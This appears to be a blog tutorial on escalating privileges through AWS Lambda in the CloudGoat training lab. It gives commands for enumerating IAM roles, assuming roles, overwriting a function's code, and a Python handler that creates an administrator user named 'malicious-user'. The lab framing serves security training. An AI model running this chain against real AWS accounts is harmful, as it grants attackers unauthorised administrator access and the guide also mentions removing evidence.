Introduction to Lambda Privilege Escalation
AWS Lambda, a serverless compute service, is a core component of modern cloud environments. While powerful, misconfigured permissions in Lambda functions can lead to privilege escalation, potentially exposing sensitive resources. This blog explores the process of executing privilege escalation via Lambda, using CloudGoat, an AWS pen-testing tool, to simulate real-world scenarios.
Understanding the Context and Importance
Privilege escalation exploits occur when attackers leverage inadequate permissions to gain elevated access. With Lambda, misconfigurations in IAM roles and policies often become the weak link. Understanding these vulnerabilities is critical for securing cloud environments and mitigating risks.
Setting Up the Environment with CloudGoat
CloudGoat simplifies the creation of vulnerable AWS environments for security testing. Here’s how to prepare your setup:
- Install CloudGoat: Clone the repository and configure it on your local machine.
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
- Configure AWS CLI: Ensure your AWS CLI is configured with a user who has sufficient permissions to create resources.
- Launch the Lambda Escalation Scenario:
./cloudgoat.py create lambda_privesc
Initial Deployment and Configuration
Once deployed, CloudGoat generates an AWS environment with a Lambda function and supporting IAM roles. Using the provided credentials, log into the AWS Management Console or AWS CLI to analyze the setup.
Enumerating Policies and Identifying Opportunities
Using the AWS CLI, enumerate the policies attached to IAM roles:
aws iam list-attached-role-policies –role-name <role-name>
Identify overly permissive policies, such as AdministratorAccess or iam:PassRole, which are common misconfigurations.
Discovering Accessible IAM Roles and Policies
Identify the roles and policies the Lambda function can interact with:
aws lambda get-policy –function-name <function-name>
Look for permissions to assume a role (sts:AssumeRole) or perform resource management actions (iam:*).
Assuming Roles and Gaining Insights
Assume a role using the sts assume-role command:
aws sts assume-role –role-arn <role-arn> –role-session-name test-session
Capture the temporary credentials and test the permissions of the assumed role.
Analyzing Role Permissions and Capabilities
Use tools like AWS Policy Simulator to analyze role permissions. Determine the actions that can be performed using the role, focusing on IAM, Lambda, or EC2 privileges.
Crafting a Lambda Function for Privilege Escalation
Write a custom Lambda function designed to exploit misconfigured permissions. For instance, a function that creates an administrator IAM user or modifies critical policies:
import boto3
def lambda_handler(event, context):
iam = boto3.client(‘iam’)
iam.create_user(UserName=’malicious-user’)
iam.attach_user_policy(
UserName=’malicious-user’,
PolicyArn=’arn:aws:iam::aws:policy/AdministratorAccess’
)
return “Escalation Successful”
Writing and Deploying the Escalation Script
Deploy the crafted Lambda function:
- Create a ZIP file of the Python script.
- Use AWS CLI to update the existing Lambda function:
aws lambda update-function-code –function-name <function-name> –zip-file fileb://<path-to-zip>
Invoking the Lambda Function and Achieving Escalation
Trigger the Lambda function:
aws lambda invoke –function-name <function-name> output.json
Review the output and confirm that the privilege escalation has been executed successfully.
Executing the Privilege Escalation Process
Validate that the newly elevated access works using the created credentials or modified roles. Test actions that were previously restricted.
Verifying the Outcome and Cleanup
Ensure all evidence of escalation is removed:
- Delete the created resources, such as users or modified policies.
- Use CloudGoat’s cleanup feature to destroy the environment:
./cloudgoat.py destroy lambda_privesc
Confirming Successful Escalation and Resource Cleanup
Review AWS CloudTrail logs to verify activity. Confirm that no unauthorized resources or configurations remain.
Conclusion
This guide demonstrates the potential risks of misconfigured Lambda functions and highlights the importance of least privilege principles. By simulating attacks with CloudGoat, organizations can proactively identify and address vulnerabilities in their AWS environments.